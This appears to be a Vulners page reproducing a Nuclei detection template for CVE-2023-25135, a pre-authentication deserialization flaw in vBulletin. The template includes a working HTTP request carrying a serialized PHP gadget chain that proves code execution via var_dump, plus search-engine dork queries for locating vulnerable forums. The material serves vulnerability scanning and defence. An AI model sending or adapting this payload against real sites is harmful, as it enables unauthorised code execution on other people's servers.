| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| The vulnerability of the commercial web forum vBulletin, related to the restoration of unreliable data in memory, allows a hacker to execute arbitrary code. | 10 Apr 202300:00 | – | bdu_fstec | |
| CVE-2023-25135 | 3 Feb 202307:25 | – | circl | |
| Gimmie vBulletin 代码问题漏洞 | 3 Feb 202300:00 | – | cnnvd | |
| CVE-2023-25135 | 3 Feb 202300:00 | – | cve | |
| CVE-2023-25135 | 3 Feb 202300:00 | – | cvelist | |
| CVE-2023-25135 | 3 Feb 202305:15 | – | nvd | |
| CVE-2023-25135 | 3 Feb 202305:15 | – | osv | |
| Deserialization of untrusted data | 3 Feb 202305:15 | – | prion | |
| CVE-2023-25135 | 23 May 202503:24 | – | redhatcve | |
| VulnCheck KEV: CVE-2023-25135 | 4 Dec 202300:00 | – | vulncheck_kev |
id: CVE-2023-25135
info:
name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable
- https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py
- https://nvd.nist.gov/vuln/detail/CVE-2023-25135
- https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch
- https://github.com/netlas-io/netlas-dorks
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-25135
cwe-id: CWE-502
epss-score: 0.23926
epss-percentile: 0.9756
cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: vbulletin
product: vbulletin
shodan-query:
- http.component:"vBulletin"
- http.html:"powered by vbulletin"
- http.component:"vbulletin"
- http.title:"powered by vbulletin"
- cpe:"cpe:2.3:a:vbulletin:vbulletin"
fofa-query:
- body="powered by vbulletin"
- title="powered by vbulletin"
google-query:
- intext:"Powered By vBulletin"
- intitle:"powered by vbulletin"
- intext:"powered by vbulletin"
tags: cve,cve2023,vbulletin,rce,vkev,vuln
http:
- raw:
- |
POST /ajax/api/user/save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'string(14)'
- '"CVE-2023-25135"'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a00483046022100e6b31a269142ecf54c49cc3a2d173ee478b05e8ff489aef4f04bd00ac1cc0aa3022100c1ba6b506d2080bc192e70a54f5744e70904cebb459f79a68d7ce0a14bd637a3:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation